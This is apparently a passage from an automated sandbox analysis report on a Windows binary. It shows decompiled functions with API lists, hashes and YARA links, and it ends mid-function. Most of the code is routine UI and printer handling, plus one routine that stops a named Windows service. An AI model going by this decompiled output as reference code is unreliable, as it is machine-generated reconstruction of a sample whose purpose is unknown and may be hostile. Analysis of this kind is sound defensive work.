?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 10003503
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 1000351D
?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 10003526
?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 10003538
?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,6E4D5DF0), ref: 10003553
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 1000356C

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V12@$??1?$basic_string@?substr@?$basic_string@$?find@?$basic_string@?length@?$basic_string@?size@?$basic_string@H_prolog
String ID:
API String ID: 2380858994-0
Opcode ID: 92410d15cdd6f63509cf5c940a50ef215f6264eeb0d980af4dda910b232eff6a
Instruction ID: ac1615b8e1b20dbe67e97663190d4d7eb703982a907514a0e58cb2ece114481d
Opcode Fuzzy Hash: 92410d15cdd6f63509cf5c940a50ef215f6264eeb0d980af4dda910b232eff6a
Instruction Fuzzy Hash: 45213035600654EFEB15DFA5DC98DAE7BB9FB88761F008169F822D72A0CB34DA44CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0040A95B, Relevance: 12.1, APIs: 8, Instructions: 65
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040A95B(void* __ecx, char* _a4) {
				void* _v8;
				void* _t15;
				void* _t20;
				void* _t35;

				_push(__ecx);
				_t35 = __ecx;
				_t15 =  *(__ecx + 0x74);
				if(_t15 != 0) {
					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
					if(_t15 == 0) {
						_t15 = OpenPrinterA(_a4,  &_v8, 0);
						if(_t15 != 0) {
							_t18 =  *(_t35 + 0x70);
							if( *(_t35 + 0x70) != 0) {
								E00416B68(_t18);
							}
							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
							 *(_t35 + 0x70) = _t20;
							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
								E00416B68( *(_t35 + 0x70));
								 *(_t35 + 0x70) = 0;
							}
							_t15 = ClosePrinter(_v8);
						}
					}
				}
				return _t15;
			}

APIs

GlobalLock.KERNEL32 ref: 0040A978
lstrcmpA.KERNEL32(?,?), ref: 0040A984
OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 0040A996
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 0040A9B6
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 0040A9BE
GlobalLock.KERNEL32 ref: 0040A9C8
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 0040A9D5
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 0040A9ED

Part of subcall function 00416B68: GlobalFlags.KERNEL32(?), ref: 00416B73
Part of subcall function 00416B68: GlobalUnlock.KERNEL32(?,?,00000000,0040A9E7,?,00000000,?,?,00000000,00000000,00000002), ref: 00416B85
Part of subcall function 00416B68: GlobalFree.KERNEL32 ref: 00416B90

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: 4e65e066ee7c0c736bfc62b430f519aee1a7dcbc9c477328668d6d0505356c1f
Instruction ID: 15369f7b54f955bbdbbf9b7ab217da6ef0376595c54705771d9723cb13c94d6a
Opcode Fuzzy Hash: 4e65e066ee7c0c736bfc62b430f519aee1a7dcbc9c477328668d6d0505356c1f
Instruction Fuzzy Hash: 9C11E3B1A00600BBCB216BB6CC49CAF7ABCFB89700B00496AFA11D1161C639DD50E738

Uniqueness

Uniqueness Score: -1.00%

Function 10002F38, Relevance: 12.1, APIs: 8, Instructions: 55
servicesleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10002F38(char* _a4) {
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				void* _t11;
				void* _t19;
				void* _t21;

				_t19 = OpenSCManagerA(0, 0, 0xf003f);
				if(_t19 == 0) {
					return 0;
				}
				_t21 = OpenServiceA(_t19, _a4, 0xf01ff);
				if(_t21 == 0) {
					L8:
					CloseServiceHandle(_t19);
					_t11 = 1;
					return _t11;
				}
				if(QueryServiceStatus(_t21,  &_v32) == 0 || _v28 == 1 || ControlService(_t21, 1,  &_v32) == 0) {
					L7:
					CloseServiceHandle(_t21);
					goto L8;
				} else {
					while(_v28 == 3) {
						Sleep(0xa);
						QueryServiceStatus(_t21,  &_v32);
					}
					goto L7;
				}
			}

0x10002f4e
0x10002f52
0x00000000
0x10002fbf
0x10002f64
0x10002f68
0x10002fb2
0x10002fb3
0x10002fbb
0x00000000
0x10002fbc
0x10002f77
0x10002fab
0x10002fac
0x00000000
0x10002f90
0x10002f90
0x10002f98
0x10002fa3
0x10002fa3
0x00000000
0x10002f90

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 10002F48
OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 10002F5E
QueryServiceStatus.ADVAPI32(00000000,?), ref: 10002F6F
ControlService.ADVAPI32(00000000,00000001,?), ref: 10002F86
Sleep.KERNEL32(0000000A), ref: 10002F98
QueryServiceStatus.ADVAPI32(00000000,?), ref: 10002FA3
CloseServiceHandle.ADVAPI32(00000000), ref: 10002FAC
CloseServiceHandle.ADVAPI32(00000000), ref: 10002FB3

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
String ID:
API String ID: 2359367111-0
Opcode ID: eaf81fa0bec9b3bcd0de39aa0a31cacbc3ed5d67930f38b89f163dcdd2fe58bf
Instruction ID: b5936a7d219c36455d776bf4c0aedc526251f080d2ed9661a6f384aa8f51903e
Opcode Fuzzy Hash: eaf81fa0bec9b3bcd0de39aa0a31cacbc3ed5d67930f38b89f163dcdd2fe58bf
Instruction Fuzzy Hash: 6D014031641227ABF711DBA4CC99FBF7AB8EF05BD1F200074FE0995099DB60864296A2

Uniqueness

Uniqueness Score: -1.00%

Function 1000C4B2, Relevance: 12.1, APIs: 8, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000C4B2(intOrPtr* __ecx) {
				struct HINSTANCE__* _t12;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t14;
				struct HINSTANCE__* _t15;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t17;
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t19;
				intOrPtr* _t29;

				_t29 = __ecx;
				_t12 =  *(__ecx + 0x10);
				 *__ecx = 0x1001b464;
				if(_t12 != 0) {
					FreeLibrary(_t12);
				}
				_t13 =  *(_t29 + 0x1c);
				if(_t13 != 0) {
					FreeLibrary(_t13);
				}
				_t14 =  *(_t29 + 8);
				if(_t14 != 0) {
					FreeLibrary(_t14);
				}
				_t15 =  *(_t29 + 0xc);
				if(_t15 != 0) {
					FreeLibrary(_t15);
				}
				_t16 =  *(_t29 + 0x18);
				if(_t16 != 0) {
					FreeLibrary(_t16);
				}
				_t17 =  *(_t29 + 0x14);
				if(_t17 != 0) {
					FreeLibrary(_t17);
				}
				_t18 =  *(_t29 + 0x20);
				if(_t18 != 0) {
					FreeLibrary(_t18);
				}
				_t19 =  *(_t29 + 0x24);
				if(_t19 != 0) {
					_t19 = FreeLibrary(_t19);
				}
				if( *(_t29 + 4) != 0) {
					 *(_t29 + 4) =  *(_t29 + 4) & 0x00000000;
					return _t19;
				}
				return _t19;
			}

0x1000c4b3
0x1000c4bc
0x1000c4bf
0x1000c4c7
0x1000c4ca
0x1000c4ca
0x1000c4cc
0x1000c4d1
0x1000c4d4
0x1000c4d4
0x1000c4d6
0x1000c4db
0x1000c4de
0x1000c4de
0x1000c4e0
0x1000c4e5
0x1000c4e8
0x1000c4e8
0x1000c4ea
0x1000c4ef
0x1000c4f2
0x1000c4f2
0x1000c4f4
0x1000c4f9
0x1000c4fc
0x1000c4fc
0x1000c4fe
0x1000c503
0x1000c506
0x1000c506
0x1000c508
0x1000c50d
0x1000c510
0x1000c510
0x1000c516
0x1000c518
0x00000000
0x1000c518
0x1000c51e

APIs

FreeLibrary.KERNEL32(?,?,?,1000CBC5), ref: 1000C4CA
FreeLibrary.KERNEL32(?,?,?,1000CBC5), ref: 1000C4D4
FreeLibrary.KERNEL32(?,?,?,1000CBC5), ref: 1000C4DE
FreeLibrary.KERNEL32(?,?,?,1000CBC5), ref: 1000C4E8
FreeLibrary.KERNEL32(?,?,?,1000CBC5), ref: 1000C4F2
FreeLibrary.KERNEL32(?,?,?,1000CBC5), ref: 1000C4FC
FreeLibrary.KERNEL32(?,?,?,1000CBC5), ref: 1000C506
FreeLibrary.KERNEL32(?,?,?,1000CBC5), ref: 1000C510

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: ef1a067d7fd0df4dde316d4827ef78361922e15b4045f197787cf190d217574d
Instruction ID: 7be5082f9bd7b9858e5a1e50d085d11aa80a819a8a536b04459e7da4f8d9859f
Opcode Fuzzy Hash: ef1a067d7fd0df4dde316d4827ef78361922e15b4045f197787cf190d217574d
Instruction Fuzzy Hash: 1C01C470700B095BEA60EF7ACC44F27F3ECBF506C1B028829A856D3664DBB4F8448A20

Uniqueness

Uniqueness Score: -1.00%

Function 100013AA, Relevance: 12.0, APIs: 8, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100013AA(void* __ecx, char* _a4, intOrPtr _a8) {
				void* __edi;
				char _t3;
				int _t4;
				char* _t8;
				char* _t18;
				void* _t20;

				_t18 = _a4;
				_t3 =  *_t18;
				if(_t3 == 0x64) {
					return E1000BF29(__ecx);
				}
				if(_t3 == 0x8b) {
					return E1000132F(__ecx, _t18);
				}
				_t4 = OpenClipboard(0);
				if(_t4 != 0) {
					EmptyClipboard();
					_t8 = GlobalAlloc(0x2000, _a8 + 1);
					_t20 = _t8;
					GlobalFix(_t20);
					strcpy(_t8, _t18);
					GlobalUnWire(_t20);
					SetClipboardData(1, _t20);
					return CloseClipboard();
				}
				return _t4;
			}

0x100013ae
0x100013b1
0x100013b5
0x00000000
0x100013b7
0x100013c0
0x00000000
0x100013c2
0x100013cb
0x100013d3
0x100013d6
0x100013e6
0x100013ec
0x100013ef
0x100013f7
0x100013ff
0x10001408
0x00000000
0x10001414
0x10001417

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: Event
String ID:
API String ID: 4201588131-0
Opcode ID: 942d75f2aa8a8e0f9be18c371f36749b4f0ce6ccbd94fe728f6961c680b718f7
Instruction ID: 37be43ac074ab4bbd4e4e9c7f976d41b251e2864f8b7280d91b58ee609cf24ab
Opcode Fuzzy Hash: 942d75f2aa8a8e0f9be18c371f36749b4f0ce6ccbd94fe728f6961c680b718f7
Instruction Fuzzy Hash: 78F0F631104225FBF2006B608C4DAEE3BACFF467A2F204021F909C6065CF70994786B2

Uniqueness

Uniqueness Score: -1.00%

Function 004208D4, Relevance: 12.0, APIs: 8, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004208D4(void* __ecx) {
				struct HDC__* _t18;
				void* _t19;

				_t19 = __ecx;
				 *((intOrPtr*)(_t19 + 8)) = GetSystemMetrics(0xb);
				 *((intOrPtr*)(_t19 + 0xc)) = GetSystemMetrics(0xc);
				 *0x4527e0 = GetSystemMetrics(2) + 1;
				 *0x4527e4 = GetSystemMetrics(3) + 1;
				_t18 = GetDC(0);
				 *((intOrPtr*)(_t19 + 0x18)) = GetDeviceCaps(_t18, 0x58);
				 *((intOrPtr*)(_t19 + 0x1c)) = GetDeviceCaps(_t18, 0x5a);
				return ReleaseDC(0, _t18);
			}

0x004208df
0x004208e5
0x004208ec
0x004208f4
0x004208fe
0x0042090f
0x00420919
0x00420921
0x0042092d

APIs

GetSystemMetrics.USER32 ref: 004208E1
GetSystemMetrics.USER32 ref: 004208E8
GetSystemMetrics.USER32 ref: 004208EF
GetSystemMetrics.USER32 ref: 004208F9
GetDC.USER32(00000000), ref: 00420903
GetDeviceCaps.GDI32(00000000,00000058), ref: 00420914
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0042091C
ReleaseDC.USER32 ref: 00420924

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsSystem$CapsDevice$Release
String ID:
API String ID: 1151147025-0
Opcode ID: fb98911d80ad8c338eb940ff8a7eba24d9deb1414422788d757d827e53f8c412
Instruction ID: fcee4d3c23d018ddaa4a0ef5ef315e199380c57e2787cfd0818a552e3ffdfc7b
Opcode Fuzzy Hash: fb98911d80ad8c338eb940ff8a7eba24d9deb1414422788d757d827e53f8c412
Instruction Fuzzy Hash: BDF01D71A40704AAE720AF71AC49F2B7BB4EBD5B51F11442AE6418B290D6B5D8018F54

Uniqueness

Uniqueness Score: -1.00%

Function 0040BBE6, Relevance: 10.8, APIs: 7, Instructions: 255
memoryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E0040BBE6(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t133;
				intOrPtr* _t140;
				int _t145;
				signed short _t148;
				short* _t149;
				intOrPtr _t152;
				signed short _t177;
				intOrPtr _t178;
				signed int _t179;
				intOrPtr _t184;
				struct tagRECT _t189;
				int _t190;
				void* _t191;
				signed short _t193;
				signed short _t194;
				void* _t195;
				void* _t221;
				intOrPtr _t225;
				short _t226;
				intOrPtr* _t233;
				void* _t234;
				signed short* _t236;
				signed int _t240;
				void* _t241;
				signed short* _t242;
				signed short* _t244;
				signed short* _t245;
				signed int _t246;
				void* _t248;

				_t246 = _t248 - 0x44;
				_t133 =  *0x44f5d0; // 0x8e7de579
				 *(_t246 + 0x48) = _t133 ^ _t246;
				_push(0x50);
				E004271DA(E004399FC, __ebx, __edi, __esi);
				_t233 =  *((intOrPtr*)(_t246 + 0x60));
				_t236 =  *(_t246 + 0x68);
				 *((intOrPtr*)(_t246 + 0x1c)) =  *((intOrPtr*)(_t246 + 0x54));
				 *(_t246 + 8) =  *(_t246 + 0x58);
				 *((intOrPtr*)(_t246 + 0x14)) =  *((intOrPtr*)(_t246 + 0x70));
				_t140 = _t233 + 0x12;
				 *((intOrPtr*)(_t246 + 0x2c)) = _t140;
				if( *((intOrPtr*)(_t246 + 0x5c)) != 0) {
					 *((intOrPtr*)(_t246 - 0x20)) =  *((intOrPtr*)(_t233 + 8));
					 *((intOrPtr*)(_t246 - 0x1c)) =  *((intOrPtr*)(_t233 + 4));
					 *((short*)(_t246 - 0x18)) =  *((intOrPtr*)(_t233 + 0xc));
					 *((short*)(_t246 - 0x16)) =  *((intOrPtr*)(_t233 + 0xe));
					 *((short*)(_t246 - 0x12)) =  *_t140;
					_t225 = _t233 + 0x18;
					 *((short*)(_t246 - 0x14)) =  *(_t233 + 0x10);
					 *((short*)(_t246 - 0x10)) =  *((intOrPtr*)(_t233 + 0x14));
					_t233 = _t246 - 0x20;
					 *((intOrPtr*)(_t246 + 0x2c)) = _t225;
				}
				_t226 =  *((short*)(_t233 + 0xa));
				_t189 =  *((short*)(_t233 + 8));
				 *((intOrPtr*)(_t246 - 0x24)) =  *((short*)(_t233 + 0xe)) + _t226;
				 *(_t246 - 0x30) = _t189;
				 *((intOrPtr*)(_t246 - 0x2c)) = _t226;
				 *((intOrPtr*)(_t246 - 0x28)) =  *((short*)(_t233 + 0xc)) + _t189;
				_t145 = MapDialogRect( *( *((intOrPtr*)(_t246 + 0x1c)) + 0x20), _t246 - 0x30);
				 *(_t246 + 0x24) =  *(_t246 + 0x24) & 0x00000000;
				if( *((intOrPtr*)(_t246 + 0x6c)) >= 4) {
					_t194 =  *_t236;
					 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - 4;
					_t236 =  &(_t236[2]);
					if(_t194 > 0) {
						__imp__#4(_t236, _t194);
						_t195 = _t194 + _t194;
						_t236 = _t236 + _t195;
						 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - _t195;
						 *(_t246 + 0x24) = _t145;
					}
				}
				 *(_t246 + 0x20) =  *(_t246 + 0x20) & 0x00000000;
				E00401FA0(_t246 + 0x28, E004151D0());
				 *((intOrPtr*)(_t246 - 4)) = 0;
				 *(_t246 + 0xc) = 0;
				 *(_t246 + 0x10) = 0;
				 *(_t246 + 0x18) = 0;
				if( *((short*)(_t246 + 0x64)) == 0x37a ||  *((short*)(_t246 + 0x64)) == 0x37b) {
					_t148 =  *_t236;
					_t57 = _t148 - 0xc; // -12
					_t226 = _t57;
					_t236 =  &(_t236[6]);
					 *_t246 = _t148;
					 *((intOrPtr*)(_t246 + 0x30)) = _t226;
					if(_t226 <= 0) {
						L16:
						 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - _t148;
						 *((intOrPtr*)(_t246 + 0x64)) =  *((intOrPtr*)(_t246 + 0x64)) + 0xfffc;
						goto L17;
					} else {
						goto L8;
					}
					do {
						L8:
						_t177 =  *_t236;
						 *((intOrPtr*)(_t246 + 0x30)) =  *((intOrPtr*)(_t246 + 0x30)) - 6;
						_t242 =  &(_t236[2]);
						_t193 =  *_t242 & 0x0000ffff;
						_t236 =  &(_t242[1]);
						 *(_t246 + 4) = _t177;
						if(_t177 != 0x80010001) {
							_t178 = E0040A3C7(__eflags, 0x1c);
							 *((intOrPtr*)(_t246 - 0x34)) = _t178;
							__eflags = _t178;
							 *((char*)(_t246 - 4)) = 1;
							if(_t178 == 0) {
								_t179 = 0;
								__eflags = 0;
							} else {
								_t179 = E0041A476(_t178,  *(_t246 + 0x20),  *(_t246 + 4), _t193);
							}
							 *((char*)(_t246 - 4)) = 0;
							 *(_t246 + 0x20) = _t179;
						} else {
							_t244 =  &(_t236[2]);
							 *(_t246 + 0x10) =  *_t236;
							_t245 =  &(_t244[6]);
							 *(_t246 + 0x18) =  *_t244;
							E00402030(_t233, _t245);
							_t184 =  *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x28)) - 0xc));
							_t221 = 0xffffffef;
							 *((intOrPtr*)(_t246 + 0x30)) =  *((intOrPtr*)(_t246 + 0x30)) + _t221 - _t184;
							_t236 = _t245 + _t184 + 1;
							 *(_t246 + 0xc) = _t193 & 0x0000ffff;
						}
					} while ( *((intOrPtr*)(_t246 + 0x30)) > 0);
					_t148 =  *_t246;
					goto L16;
				} else {
					L17:
					_t149 =  *((intOrPtr*)(_t246 + 0x2c));
					_t263 =  *_t149 - 0x7b;
					_push(_t246 + 0x38);
					_push(_t149);
					if( *_t149 != 0x7b) {
						__imp__CLSIDFromProgID();
					} else {
						__imp__CLSIDFromString();
					}
					_t190 = 0;
					_push(0);
					_push( *((intOrPtr*)(_t246 + 0x6c)));
					_push(_t236);
					 *((intOrPtr*)(_t246 + 0x2c)) = _t149;
					E00420072(0, _t246 - 0x5c, _t233, _t236, _t263);
					 *((char*)(_t246 - 4)) = 2;
					 *((intOrPtr*)(_t246 + 0x34)) = 0;
					asm("sbb esi, esi");
					_t240 =  ~( *((intOrPtr*)(_t246 + 0x64)) - 0x378) & _t246 - 0x0000005c;
					_t264 =  *((intOrPtr*)(_t246 + 0x2c));
					if( *((intOrPtr*)(_t246 + 0x2c)) >= 0) {
						_push(1);
						if(E0041830A(0,  *((intOrPtr*)(_t246 + 0x1c)), _t233, _t240, _t264) != 0 && E004188A7( *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x1c)) + 0x4c)), 0, _t246 + 0x38, 0,  *_t233, _t246 - 0x30,  *(_t233 + 0x10) & 0x0000ffff, _t240, 0 |  *((short*)(_t246 + 0x64)) == 0x00000377,  *(_t246 + 0x24), _t246 + 0x34) != 0) {
							E00419A90( *((intOrPtr*)(_t246 + 0x34)), 1);
							SetWindowPos( *( *((intOrPtr*)(_t246 + 0x34)) + 0x24),  *(_t246 + 8), 0, 0, 0, 0, 0x13);
							 *( *((intOrPtr*)(_t246 + 0x34)) + 0x94) =  *(_t246 + 0x20);
							E0040BB45(0,  *((intOrPtr*)(_t246 + 0x34)) + 0xa4, _t246, _t246 + 0x28);
							 *((short*)( *((intOrPtr*)(_t246 + 0x34)) + 0x98)) =  *(_t246 + 0xc);
							 *( *((intOrPtr*)(_t246 + 0x34)) + 0x9c) =  *(_t246 + 0x10);
							 *( *((intOrPtr*)(_t246 + 0x34)) + 0xa0) =  *(_t246 + 0x18);
						}
					}
					if( *(_t246 + 0x24) != _t190) {
						__imp__#6( *(_t246 + 0x24));
					}
					_t152 =  *((intOrPtr*)(_t246 + 0x34));
					if(_t152 == _t190) {
						 *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x14)))) = _t190;
					} else {
						 *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x14)))) =  *((intOrPtr*)(_t152 + 0x24));
						_t190 = 1;
					}
					 *((char*)(_t246 - 4)) = 0;
					E004203D4(_t190, _t246 - 0x5c, _t233, _t240, 1);
					E00401E60( *((intOrPtr*)(_t246 + 0x28)) + 0xfffffff0, _t226);
					 *[fs:0x0] =  *((intOrPtr*)(_t246 - 0xc));
					_pop(_t234);
					_pop(_t241);
					_pop(_t191);
					return E0042569C(_t190, _t191,  *(_t246 + 0x48) ^ _t246, _t226, _t234, _t241);
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 0040BBFF
MapDialogRect.USER32(?,00000000), ref: 0040BC90
SysAllocStringLen.OLEAUT32(?,?), ref: 0040BCAF
CLSIDFromString.OLE32(?,?,00000000), ref: 0040BDA1

Part of subcall function 0040A3C7: _malloc.LIBCMT ref: 0040A3E1

CLSIDFromProgID.OLE32(?,?,00000000), ref: 0040BDA9
SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013,00000001,00000000,?,00000000,?,00000000,00000000,0000FC84,00000000), ref: 0040BE43
SysFreeString.OLEAUT32(00000000), ref: 0040BE95

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: String$From$AllocDialogFreeH_prolog3ProgRectWindow_malloc
String ID:
API String ID: 2841959276-0
Opcode ID: 75e4ce61182f7c03f6ee0c6e5374d08c5e63a1d642331971cdebbabc8fdfcec9
Instruction ID: fa3a14ef4653b017ed2668dcd9d64acbdbf55b3be4bfa060d7010d0ccb21a78f
Opcode Fuzzy Hash: 75e4ce61182f7c03f6ee0c6e5374d08c5e63a1d642331971cdebbabc8fdfcec9
Instruction Fuzzy Hash: 76B1F775900209AFDB04DF65D984AEE77B4FF08314F00812AFC19A7391E778E994CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041F0CC, Relevance: 10.6, APIs: 7, Instructions: 128
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E0041F0CC(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t76;
				intOrPtr _t78;
				intOrPtr _t89;
				intOrPtr* _t93;
				intOrPtr* _t96;
				intOrPtr* _t98;
				void* _t103;
				intOrPtr _t120;
				void* _t122;
				void* _t123;
				void* _t124;

				_t116 = __edx;
				_push(0x6c);
				E004271DA(E0043B113, __ebx, __edi, __esi);
				_t122 = __ecx;
				 *((intOrPtr*)(__ecx + 0x44)) = 1;
				 *(_t123 - 0x14) = 0;
				 *(_t123 - 0x10) = 0;
				if( *((intOrPtr*)(__ecx + 0x10)) <= 0) {
					L18:
					 *(_t122 + 0x44) =  *(_t122 + 0x44) & 0x00000000;
					return E004272B2(0);
				} else {
					goto L1;
				}
				do {
					L1:
					_t108 =  *(_t123 - 0x10) * 0x28;
					_t76 =  *((intOrPtr*)( *((intOrPtr*)(_t122 + 0x14)) + 0x24 +  *(_t123 - 0x10) * 0x28));
					if(_t76 == 0) {
						goto L17;
					}
					_t78 =  *((intOrPtr*)(_t76 + 4));
					 *((intOrPtr*)(_t123 - 0x20)) = _t78;
					if(_t78 == 0) {
						goto L17;
					}
					 *(_t123 - 0x18) =  *(_t123 - 0x14) << 4;
					do {
						_t120 =  *((intOrPtr*)(E0040B523(_t123 - 0x20)));
						 *((intOrPtr*)(_t123 - 0x24)) = 0xfffffffd;
						E004277B0(_t120, _t123 - 0x78, 0, 0x20);
						_t124 = _t124 + 0xc;
						E00422542(_t123 - 0x48);
						 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
						_t130 =  *((intOrPtr*)(_t122 + 0x48));
						if( *((intOrPtr*)(_t122 + 0x48)) == 0) {
							_t89 =  *((intOrPtr*)(_t122 + 0x40)) +  *(_t123 - 0x18);
							__eflags = _t89;
						} else {
							_t103 = E0041EBB5(_t108, _t122, _t116, _t120, _t122, _t130);
							 *(_t123 - 4) = 1;
							E00422522(_t103, _t123 - 0x48, _t103);
							 *(_t123 - 4) = 0;
							__imp__#9(_t123 - 0x58, _t123 - 0x58,  *(_t123 - 0x10) + 1);
							_t89 = _t123 - 0x48;
						}
						 *((intOrPtr*)(_t123 - 0x38)) = _t89;
						 *((intOrPtr*)(_t123 - 0x34)) = _t123 - 0x24;
						 *((intOrPtr*)(_t123 - 0x30)) = 1;
						 *((intOrPtr*)(_t123 - 0x2c)) = 1;
						 *(_t120 + 0x88) = 1;
						_t93 =  *((intOrPtr*)(_t120 + 0x50));
						if(_t93 != 0) {
							_t116 = _t123 - 0x1c;
							_push(_t123 - 0x1c);
							_push(0x441d44);
							_push(_t93);
							if( *((intOrPtr*)( *_t93))() >= 0) {
								_t96 =  *((intOrPtr*)(_t123 - 0x1c));
								_t116 = _t123 - 0x38;
								 *((intOrPtr*)( *_t96 + 0x18))(_t96,  *((intOrPtr*)(_t120 + 0x9c)), 0x441db4, 0, 4, _t123 - 0x38, 0, _t123 - 0x78, _t123 - 0x28);
								_t98 =  *((intOrPtr*)(_t123 - 0x1c));
								 *((intOrPtr*)( *_t98 + 8))(_t98);
								 *(_t120 + 0x88) =  *(_t120 + 0x88) & 0x00000000;
